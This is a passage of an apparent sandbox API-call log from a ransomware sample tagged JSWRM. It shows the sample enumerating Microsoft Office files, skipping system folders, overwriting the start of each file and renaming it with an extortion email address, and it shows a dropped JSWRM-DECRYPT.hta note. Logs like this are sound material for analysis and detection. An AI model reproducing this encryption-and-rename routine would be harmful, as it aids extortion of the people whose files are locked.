Office\\root\\Office16\\PUBWIZ\\HEADINGBB.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\headingbb.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.990] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21d4ea61, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21d4ea61, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2293a966, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27e6, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="HEADINGBB.POC", cAlternateFileName="HEADIN~1.POC")) returned 1 [0141.990] lstrcmpiW (lpString1="HEADINGBB.POC", lpString2=".") returned 1 [0141.990] lstrcmpiW (lpString1="HEADINGBB.POC", lpString2="..") returned 1 [0141.990] lstrcmpiW (lpString1="HEADINGBB.POC", lpString2="...") returned 1 [0141.990] lstrcmpiW (lpString1="HEADINGBB.POC", lpString2="windows") returned -1 [0141.990] lstrcmpiW (lpString1="HEADINGBB.POC", lpString2="recovery") returned -1 [0141.991] lstrcmpiW (lpString1="HEADINGBB.POC", lpString2="perflogs") returned -1 [0141.991] lstrcmpiW (lpString1="HEADINGBB.POC", lpString2="documents and settings") returned 1 [0141.991] lstrcmpiW (lpString1="HEADINGBB.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.991] lstrcmpiW (lpString1="HEADINGBB.POC", lpString2="system volume information") returned -1 [0141.991] lstrcmpiW (lpString1="HEADINGBB.POC", lpString2="msocache") returned -1 [0141.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HEADINGBB.POC", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HEADINGBB.POC", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HEADINGBB.POC", lpUsedDefaultChar=0x0) returned 13 [0141.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HEADINGBB.POC", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HEADINGBB.POC", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HEADINGBB.POC", lpUsedDefaultChar=0x0) returned 13 [0141.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\HEADINGBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\headingbb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.992] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10214) returned 1 [0141.992] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.992] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x27e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x27e0, lpOverlapped=0x0) returned 1 [0141.997] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.997] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x27e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x27e0, lpOverlapped=0x0) returned 1 [0141.997] CloseHandle (hObject=0x238) returned 1 [0141.997] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\HEADINGBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\headingbb.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\HEADINGBB.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\headingbb.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.998] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21d4ea61, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21d4ea61, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x233f5084, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3cbaf6, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="INVITE.DPV", cAlternateFileName="")) returned 1 [0141.998] lstrcmpiW (lpString1="INVITE.DPV", lpString2=".") returned 1 [0141.998] lstrcmpiW (lpString1="INVITE.DPV", lpString2="..") returned 1 [0141.998] lstrcmpiW (lpString1="INVITE.DPV", lpString2="...") returned 1 [0141.998] lstrcmpiW (lpString1="INVITE.DPV", lpString2="windows") returned -1 [0141.998] lstrcmpiW (lpString1="INVITE.DPV", lpString2="recovery") returned -1 [0141.998] lstrcmpiW (lpString1="INVITE.DPV", lpString2="perflogs") returned -1 [0141.998] lstrcmpiW (lpString1="INVITE.DPV", lpString2="documents and settings") returned 1 [0141.998] lstrcmpiW (lpString1="INVITE.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.998] lstrcmpiW (lpString1="INVITE.DPV", lpString2="system volume information") returned -1 [0141.998] lstrcmpiW (lpString1="INVITE.DPV", lpString2="msocache") returned -1 [0141.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVITE.DPV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVITE.DPV", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INVITE.DPV", lpUsedDefaultChar=0x0) returned 10 [0141.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVITE.DPV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVITE.DPV", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INVITE.DPV", lpUsedDefaultChar=0x0) returned 10 [0141.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\INVITE.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\invite.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.999] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3980022) returned 1 [0142.000] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.000] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0142.013] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.013] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0142.013] CloseHandle (hObject=0x238) returned 1 [0142.014] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\INVITE.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\invite.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\INVITE.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\invite.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.015] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22986bc2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22986bc2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22986bc2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x49c6, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="INVITE.XML", cAlternateFileName="")) returned 1 [0142.015] lstrcmpiW (lpString1="INVITE.XML", lpString2=".") returned 1 [0142.015] lstrcmpiW (lpString1="INVITE.XML", lpString2="..") returned 1 [0142.015] lstrcmpiW (lpString1="INVITE.XML", lpString2="...") returned 1 [0142.015] lstrcmpiW (lpString1="INVITE.XML", lpString2="windows") returned -1 [0142.015] lstrcmpiW (lpString1="INVITE.XML", lpString2="recovery") returned -1 [0142.015] lstrcmpiW (lpString1="INVITE.XML", lpString2="perflogs") returned -1 [0142.015] lstrcmpiW (lpString1="INVITE.XML", lpString2="documents and settings") returned 1 [0142.015] lstrcmpiW (lpString1="INVITE.XML", lpString2="$RECYCLE.BIN") returned 1 [0142.015] lstrcmpiW (lpString1="INVITE.XML", lpString2="system volume information") returned -1 [0142.015] lstrcmpiW (lpString1="INVITE.XML", lpString2="msocache") returned -1 [0142.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVITE.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVITE.XML", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INVITE.XML", lpUsedDefaultChar=0x0) returned 10 [0142.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVITE.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVITE.XML", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INVITE.XML", lpUsedDefaultChar=0x0) returned 10 [0142.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\INVITE.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\invite.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.016] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18886) returned 1 [0142.016] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.016] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x49c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x49c0, lpOverlapped=0x0) returned 1 [0142.019] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.019] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x49c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x49c0, lpOverlapped=0x0) returned 1 [0142.019] CloseHandle (hObject=0x238) returned 1 [0142.019] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\INVITE.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\invite.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\INVITE.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\invite.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.020] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22986bc2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22986bc2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22986bc2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc448, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="INVITE11.POC", cAlternateFileName="")) returned 1 [0142.020] lstrcmpiW (lpString1="INVITE11.POC", lpString2=".") returned 1 [0142.020] lstrcmpiW (lpString1="INVITE11.POC", lpString2="..") returned 1 [0142.020] lstrcmpiW (lpString1="INVITE11.POC", lpString2="...") returned 1 [0142.020] lstrcmpiW (lpString1="INVITE11.POC", lpString2="windows") returned -1 [0142.020] lstrcmpiW (lpString1="INVITE11.POC", lpString2="recovery") returned -1 [0142.020] lstrcmpiW (lpString1="INVITE11.POC", lpString2="perflogs") returned -1 [0142.020] lstrcmpiW (lpString1="INVITE11.POC", lpString2="documents and settings") returned 1 [0142.020] lstrcmpiW (lpString1="INVITE11.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.020] lstrcmpiW (lpString1="INVITE11.POC", lpString2="system volume information") returned -1 [0142.020] lstrcmpiW (lpString1="INVITE11.POC", lpString2="msocache") returned -1 [0142.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVITE11.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVITE11.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INVITE11.POC", lpUsedDefaultChar=0x0) returned 12 [0142.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVITE11.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVITE11.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INVITE11.POC", lpUsedDefaultChar=0x0) returned 12 [0142.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\INVITE11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\invite11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.021] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=771144) returned 1 [0142.021] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.021] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0142.036] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.036] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0142.036] CloseHandle (hObject=0x238) returned 1 [0142.036] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\INVITE11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\invite11.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\INVITE11.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\invite11.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.037] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a3bc81f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4a3bc81f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4a3bc81f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0142.037] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0142.037] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0142.037] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0142.038] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0142.038] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0142.038] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0142.038] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0142.038] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0142.038] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0142.038] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0142.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0142.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0142.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0142.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0142.038] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22b5084f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22b5084f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22ca7e1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a1ac, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="LABEL.DPV", cAlternateFileName="")) returned 1 [0142.038] lstrcmpiW (lpString1="LABEL.DPV", lpString2=".") returned 1 [0142.038] lstrcmpiW (lpString1="LABEL.DPV", lpString2="..") returned 1 [0142.038] lstrcmpiW (lpString1="LABEL.DPV", lpString2="...") returned 1 [0142.038] lstrcmpiW (lpString1="LABEL.DPV", lpString2="windows") returned -1 [0142.038] lstrcmpiW (lpString1="LABEL.DPV", lpString2="recovery") returned -1 [0142.038] lstrcmpiW (lpString1="LABEL.DPV", lpString2="perflogs") returned -1 [0142.038] lstrcmpiW (lpString1="LABEL.DPV", lpString2="documents and settings") returned 1 [0142.038] lstrcmpiW (lpString1="LABEL.DPV", lpString2="$RECYCLE.BIN") returned 1 [0142.038] lstrcmpiW (lpString1="LABEL.DPV", lpString2="system volume information") returned -1 [0142.038] lstrcmpiW (lpString1="LABEL.DPV", lpString2="msocache") returned -1 [0142.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABEL.DPV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0142.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABEL.DPV", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LABEL.DPV", lpUsedDefaultChar=0x0) returned 9 [0142.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABEL.DPV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0142.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABEL.DPV", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LABEL.DPV", lpUsedDefaultChar=0x0) returned 9 [0142.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LABEL.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\label.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.041] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=172460) returned 1 [0142.041] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.041] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0142.052] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, 